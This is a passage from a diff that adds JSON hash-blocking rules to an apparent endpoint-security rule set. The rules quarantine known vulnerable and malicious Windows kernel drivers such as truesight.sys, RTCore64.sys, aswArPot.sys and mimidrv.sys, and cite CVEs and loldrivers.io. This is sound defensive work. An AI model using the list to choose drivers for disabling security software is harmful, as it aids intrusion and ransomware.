+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476738Z",
+ "creation_date": "2026-03-23T11:45:30.476742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476751Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b22adc61900fbdc26629dc1135344d878f6a368ec6df0d4ec374559cb669182",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59a6c8f3-81d6-51b7-a65e-2cb4970fd828",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985100Z",
+ "creation_date": "2026-03-23T11:45:29.985102Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42de79eb237293befb1b954beaf92b832f947195e3c359048aaa464ead56b62d",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59b0ec94-a57d-5ade-ad45-b89bb8d2777c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818846Z",
+ "creation_date": "2026-03-23T11:45:31.818849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4a58f058a2a1dfa89c48a813bbca325f850e90766f7061b664c1c7ea0077c2e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59b9fdbd-9ee7-5799-bfe6-c3f22d1f82f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814944Z",
+ "creation_date": "2026-03-23T11:45:31.814954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34491f04384ba04126640ded17704d1aab2a1db415c93fbc718b6c680fc8a12b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59c11618-9b7a-5c9c-9313-78e1fc587563",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824084Z",
+ "creation_date": "2026-03-23T11:45:31.824088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90e329a85e21dea3cb0726b2377e43bb2b7af4549caf6f8bd90526af4863b35c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59c22c02-d921-5ffd-b1ab-6f577c9c0697",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619337Z",
+ "creation_date": "2026-03-23T11:45:29.619339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59db818d-3cad-5d9e-a7a2-04a41591eb94",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823572Z",
+ "creation_date": "2026-03-23T11:45:30.823574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5f9c3e3bf7efab4013d1db04e09abc90f1c7e2eaf0709ab8dc75b1ab9c2ff91",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59f0ef64-0889-5a83-b08a-ac2c3c625bd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491033Z",
+ "creation_date": "2026-03-23T11:45:31.491037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cde0c2744775258f44f1c282220501a98ad3f32566b77e926475c50477f1f653",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59f2f54b-d430-5bc3-898b-508da5f424d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981506Z",
+ "creation_date": "2026-03-23T11:45:29.981508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af298d940b186f922464d2ef19ccfc129c77126a4f337ecf357b4fe5162a477c",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59f4cb30-d3ac-57f5-b3bd-8578242f54ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607765Z",
+ "creation_date": "2026-03-23T11:45:29.607767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aafb95a443911e4c67d4e45ffa83cca103c91b42915b81100534dc439bec0c1b",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a00cbc4-24b1-5572-9730-9edd2dc28ac4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825915Z",
+ "creation_date": "2026-03-23T11:45:30.825918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da2d5db1dde9313c86e08591f58fa10344ec32173d293376b8838cdf4206dda8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a034ef9-2cfb-5ae3-bd5b-00156639cee0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986136Z",
+ "creation_date": "2026-03-23T11:45:29.986138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a7a497010579fde69cd52bed8de28db610c33bbc5ce0774459dcf64657b802",
+ "comment": "Vulnerable Kernel Driver (aka directio.sys) [https://www.loldrivers.io/drivers/a2c3f6e9-25a5-4b75-8c6b-ad2d4e155822/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a1fc55a-9f65-5213-9f99-a4e2e163a119",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828825Z",
+ "creation_date": "2026-03-23T11:45:30.828827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd96a63f6fdc50f67cd7cbc5e2bd8173c014254a80dd30f89474ac607f80a63a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a255d95-da22-5b78-8cfc-c2048fb34254",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823452Z",
+ "creation_date": "2026-03-23T11:45:30.823455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c1ca510e02e5b44f0999db444da05d4b1883621043ca396b8a41e3271e84602",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a33df7c-5145-58a3-873a-369dc71a051e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969733Z",
+ "creation_date": "2026-03-23T11:45:29.969735Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a801e12c32c0eb197b3cc507d096afc16a32dca6bc71d080e1ae2c17ad13b2ca",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a383163-6778-524b-90fa-ff5513e087aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817498Z",
+ "creation_date": "2026-03-23T11:45:31.817500Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "556356bb664b9f3a221075c070e3eddc0470eb5e38efaf2a8bdac6ed0c4a3159",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a402dbb-5c0c-50ef-8168-28b66a807f56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462919Z",
+ "creation_date": "2026-03-23T11:45:30.462922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f03f0fb3a26bb83e8f8fa426744cf06f2e6e29f5220663b1d64265952b8de1a1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a409913-94aa-5b80-bcc7-41f272dfdfb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969768Z",
+ "creation_date": "2026-03-23T11:45:29.969770Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60ae64ade82e9364e95f779bbf950571484aa833ece6837489329517012c7757",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a4957aa-f52d-57d5-a93d-c649dca517f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473484Z",
+ "creation_date": "2026-03-23T11:45:30.473488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473497Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "baec06b150e0298136275860ecb0aae08a9bd731ef14d255fc729c4bd7e4d832",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a4fcbe9-01a9-55ef-9a40-87531ad89cea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831531Z",
+ "creation_date": "2026-03-23T11:45:30.831533Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fead8e6283e71d49cdf327f467bd26aa68db79434c82851be34e7652a20a5258",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a5c39f0-e244-5356-a900-4da6fb1636e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985339Z",
+ "creation_date": "2026-03-23T11:45:29.985340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985346Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9b49b52b493b53cd49c12c3fa9553e57c5394555b64e32d1208f5b96a5b8c6e",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a5f081d-c6ea-55a1-80e1-02928dc58158",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611079Z",
+ "creation_date": "2026-03-23T11:45:29.611081Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a50cf5d2189991851565fa73e205b0b56759de78ff415d0f2d3186fb6228b15f",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a5f3bbc-f802-55a4-997f-1e15288d46d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981745Z",
